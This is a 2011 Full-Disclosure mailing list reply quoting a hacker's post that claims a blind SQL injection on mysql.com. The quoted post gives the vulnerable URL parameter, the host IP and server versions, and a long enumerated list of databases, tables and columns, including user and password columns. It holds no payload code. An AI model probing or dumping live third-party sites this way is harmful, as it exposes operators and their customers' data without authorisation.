Date: Sun, 27 Mar 2011 12:54:53 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: Jack haxor <jackh4xor@...ky0u.org>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: MySQL.com Vulnerable To Blind SQL Injection Vulnerability

lmao.

Was this accomplished using a standard pattern from sqlmap, or did you make
your own?

On Sun, Mar 27, 2011 at 6:46 AM, Jack haxor <jackh4xor@...ky0u.org> wrote:

>
>
> ---------------------------------------------------------------------------------------
> [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
> [+] Author: Jackh4xor @ w4ck1ng
> [+] Site: http://www.jackh4xor.com
>
> ---------------------------------------------------------------------------------------
>
> About MySQL.com :
>
> --------------------------------------------------------------------------------------------------------------------
>
> The MySQL website offers database software, services and support for your
> business, including the Enterprise server, the Network monitoring and
> advisory services and the production support. The wide range of products
> include: MySQL clusters, embedded database, drivers for JDBC, ODBC and Net,
> visual database tools (query browser, migration toolkit) and last but not
> least the MaxDB, the open source database certified for SAP/R3. The MySQL
> services are also made available for you. Choose among the MySQL training
> for database solutions, MySQL certification for the Developers and DBAs,
> MySQL consulting and support. It makes no difference if you are new in the
> database technology or a skilled developer or DBA, MySQL proposes services
> of all sorts for their customers.
>
> --------------------------------------------------------------------------------------------------------------------
>
>
>
> Vulnerable Target  :   http://mysql.com/customers/view/index.html?id=1170
> Host IP                  :   213.136.52.29
> Web Server           :   Apache/2.2.15 (Fedora)
> Powered-by           :   PHP/5.2.13
> Injection Type        :   MySQL Blind
> Current DB             :   web
>
> Data Bases:
>
> information_schema
> bk
> certification
> c?ashme
> cust_sync_interim
> customer
> dbasavings
> downloads
> feedback
> glassfish_interface
> intranet
> kaj
> license_customers
> manual
> manual_search
> mem
> mysql
> mysqlforge
> mysqlweb
> news_events
> partner_t?aining
> partners
> partners_bak
> phorum5
> planetmysql
> qa_contribution
> quickpoll
> robin
> rp
> sampo
> sampo_interface
> sessions
> softrax
> softrax_interim
> solutions
> tco
> test
> track
> track_refer
> wb
> web
> web_control
> web_projects
> web_training
> webwiki
> wordpress
> zack
>
> Current DB: web
>
> Tables
>
> xing_validation
> v_web_submissions
> userbk
> user_extra
>
> user  Columns: cwpid version lead_quality sfid industry address2 created
> last_modified lang notify newsletter gid title fax cell phone country
> zipcode state city address business company position lastname firstname
> passwd verified bounces email user_id
>
> us_zip_state
> us_area_state
> unsub_log
> trials
> trial_external_log
> trial_data
> trial_alias
> training_redirect
> tag_blacklist
> tag_applied
> tag
> support_feeds_DROP
> support_entries_DROP
> states
> snapshots_builds
> snapshots
> sakilapoints
> regions
> quote_customer
> quote
> quicklinks
> promo
> product_releases
> position
> partner
> paper_lead
> paper_details_options
> paper_details_old
> paper_details
> paper
> newsletter_unsub
> nav_sites
> nav_items
> mysql_history
> mirror_status
> mirror_country
> mirror_continent
> mirror
> mailing_list_member
> mailing_list
> locks
> lead_validity_rules
> lead_source_xref
> lead_source_external
> lead_source
> lead_routing_rule
> lead_rep
> lead_old
> lead_note
> lead_extra_old
> lead_extra_new
> lead_extra
> lead_companies
> lead_campaign_member
> lead
> language_strings
> language_modules
> imagecache
> hall_of_fame
> g_search_term
> g_search_data
> g_blog_data
> forum_comment
> forms
> field_xref
> field_options
> field_match
> email_blacklist
> email_a_friend
> drpl_manual_review
> drpl_denied
> drpl_check_log
> drpl_cache
> customer_meta_sets
> customer_meta_set
> customer_meta
> customer
> coupon_product
> coupon_campaign_attribute
> coupon_campaign
> coupon
> country
> countries
> campaign_type
> campaign_topic
> campaign_score
> campaign_listdata
> campaign_detail
> business
> bounces
>
> Database : mysql
> Table:
>
> user_info
>
> user     Column: Update_pri Insert_priv Select_priv Password User Host
>
> time_zone_transition_type
> time_zone_transition
> time_zone_name
> time_zone_leap_second
> time_zone
> tables_priv
> slow_log
> ?ervers
> procs_priv
> proc
> plugin
> ndb_binlog_index
> inventory
> host
> help_topic
> help_relation
> help_keyword
> help_category
> general_log
> func
> event
> db
> columns_priv
>
>
> # mysql.user Data
>
>
> Database: web_control
>
> Table:
> system
> system_command
> service_request
> run_control
> request_daemon
> rebuild_server
> rebuild_queue
> rebuild_control
> quarterly_lead_report
> newsletter_log
> newsletter_control
> ips
> hosts  Columns:notes description name
> dns_servers Columns: name internal ip
>
>
> Database: certification
>
> Tables:
> signup
> corpcustomers
> certexamdata
> certcandidatedata
> certaccess
>
>
> Database: wordpress
>
> Tables:
>
> wp_4_term_taxonom
> wp_4_term_relationships
> wp_4_posts
> wp_4_postmeta
> wp_4_options
> wp_4_links
> wp_4_comments
> wp_3_terms
> wp_3_term_taxonomy
> wp_3_term_relationships
> wp_3_posts
> wp_3_postmeta
> wp_3_options
> wp_3_links
> wp_3_comments
> wp_2_terms
> wp_2_term_taxonomy
> wp_2_term_relationships
> wp_2_posts
> wp_2_postmeta
> wp_2_options
> wp_2_links
> wp_2_comments
> wp_1_terms
> wp_1_term_taxonomy
> wp_1_term_relationships
> wp_1_posts
> wp_1_postmeta
> wp_1_options
> wp_1_links
> wp_1_comments
> wp_11_terms
> wp_11_term_taxonomy
> wp_11_term_relationships
> wp_11_posts
> wp_11_postmeta
> wp_11_options
> wp_11_links
> wp_11_comments
> wp_10_terms
> wp_10_term_taxonomy
> wp_10_term_relationships
> wp_10_posts
> wp_10_postmeta
> wp_10_options
> wp_10_links
> wp_10_comments
> remove_queries
>
>
>
> Database: bk
>
> Table:
> wp_backupterm_taxonomy
> wp_backupterm_relationships
> wp_backupposts
> wp_backuppostmeta
> wp_backupoptions
> wp_backuplinks
> wp_backupcomments
>
>
>
> -----------------------------------------------------------------------------------
> Signed : Jackh4xor ! [image: Smile]
>
> Greetz : rooto, Mr.52, zone-hacker, w4ck1ng
>
> (In)Security
>
> -------------------------------------------------------------------------------------
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
